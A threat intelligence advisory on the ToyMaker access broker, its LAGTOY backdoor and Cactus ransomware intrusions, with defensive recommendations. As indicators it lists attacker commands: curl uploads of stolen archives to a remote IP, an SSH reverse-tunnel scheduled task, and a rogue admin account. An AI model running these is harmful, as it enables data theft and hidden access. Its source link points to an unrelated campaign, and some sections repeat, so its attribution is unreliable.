Toymaker: The Initial Access Broker Fueling Double Extortion Ransomware Gangs

ToyMaker is an initial access broker (IAB) identified by Cisco Talos, responsible for infiltrating critical infrastructure organizations by exploiting internet-exposed vulnerabilities. Once access is gained, ToyMaker deploys a custom backdoor known as LAGTOY, which facilitates the extraction of credentials and offers backdoor access to secondary threat actors like the Cactus ransomware group. These gangs leverage the access to deploy double extortion tactics, including ransomware deployment, data theft, and extortion.

Severity Level: High

Threat Overview:

1. Initial Compromise & Credential Extraction
   o ToyMaker exploits vulnerabilities in internet-facing servers to gain unauthorized access to the victim’s network.
   o The attack typically starts with user enumeration and preliminary reconnaissance, followed by the creation of a fake user account and the extraction of credentials using the Magnet RAM Capture tool.
2. Deployment of LAGTOY
   o Once the system is compromised, ToyMaker deploys LAGTOY, a custom-made backdoor that facilitates reverse shell connections and remote command execution.
   o LAGTOY is set up as a Windows service, which periodically communicates with the C2 to receive commands to execute on the infected endpoints. It can gather system information, such as network configurations, user data, and execute further malicious commands.
3. Handover to Secondary Threat Actors
   o After approximately three weeks of inactivity, ToyMaker hands over access to Cactus, a ransomware group. Cactus takes over by conducting network enumeration and identifying additional high-value targets within the network.
4. Data Exfiltration and Ransomware Deployment:
   o Cactus conducts extensive data exfiltration, using tools like 7zip and curl to compress and transfer sensitive files from the victim’s systems.
   o Once data is stolen, they deploy ransomware and use remote management tools such as AnyDesk, eHorus, and OpenSSH to maintain control over the compromised systems and remove traces of their activities, making detection and recovery more difficult.
5. Data Exfiltration and Ransomware Deployment:
   o As part of the double extortion tactic, Cactus threatens to leak the stolen data unless the victim pays the ransom. The encryption of critical files, combined with the threat of public data exposure, creates significant pressure on the victim to comply with the ransom demands.

Recommendations:

1. Ensure that all internet-facing servers are regularly patched, especially those running known vulnerable services.
2. Disable unused remote access services, enforce strong authentication (e.g., multi-factor authentication), and regularly review access logs to identify any unauthorized access attempts.
3. Implement account auditing practices to ensure that all user accounts are legitimate and necessary. Disable or delete unused accounts immediately.
4. Implement immutable backups and ensure they are tested regularly for recovery. Ensure that backup files are isolated from the primary network to prevent ransomware from encrypting them.
5. Monitor for new system processes being created, especially suspicious ones like WmiPrvSV (associated with LAGTOY).
   • Indicator: sc create WmiPrvSV start= auto error= ignore binPath= C:\Program Files\Common Files\Services\WmiPrvSV.exe
6. Monitor for execution of PowerShell scripts, cmd.exe, or other command-line interfaces used for remote command execution. Indicator commands:
   • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File .\fs.ps1 result.csv
   • C:\PerfLogs\Admin\7z.exe a -p<password> pss.7z .\result.csv
   • C:\PerfLogs\Admin\curl.exe -k -T .\pss.7z hxxps[:]//<remote_ip>:8443
   • C:\PerfLogs\Admin\7z.exe a -p<pwd> .\CP-SERVER3.7z .\CP-SERVER3.txt
   • C:\PerfLogs\Admin\7z.exe a -p<pwd> .\FILEN01.7z .\FILEN01.txt
   • C:\PerfLogs\Admin\curl[.]exe -k -T .\CP-SERVER3.7z hxxps[://]<remote_ip>:8443
   • C:\PerfLogs\Admin\curl[.]exe -p -k -T .\FILEN01.7z hxxps[://]<remote_ip>:8443
   • C:\PerfLogs\Admin\7z[.]exe a -p<pwd> .\FILE-SERVER.7z .\FILE-SERVER[.]txt
   • C:\PerfLogs\Admin\curl[.]exe -k -T .\FILE-SERVER.7z hxxps[://]<remote_ip>:8443
7. Monitor the creation or modification of scheduled tasks, especially those with unusual command-line arguments or running under SYSTEM privileges. Indicator commands:
   • SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c c:\Windows\temp\sys_log.bat > c:\Windows\temp\log.txt
   • SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO (C:\ProgramData\ssh\ssh.exe -o “StrictHostKeyChecking no” root@<remote_ip> -p 443 -R 25369 -NCqf -i “C:\Windows\temp\syslog.txt” & timeout /t 15)
8. Monitor for new system processes being created, especially suspicious ones like WmiPrvSV (associated with LAGTOY).
   • Indicator: sc create WmiPrvSV start= auto error= ignore binPath= C:\Program Files\Common Files\Services\WmiPrvSV.exe
9. Watch for the creation of new user accounts, especially ones that are added to the Administrator group (e.g., account named “support”). Indicator commands:
   • net user support Sup0rtadmin /add;
   • net localgroup administrators support /add
10. Block the IOCs at their respective controls.
    • https://www.virustotal.com/gui/collection/be1d20e3ef2661b51af94ddd853998503a3bcc2fe2252627a3bb8a598acd5333/iocs

Source:

• https://www.security.com/threat-intelligence/billbug-china-espionage

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn.

No related posts found.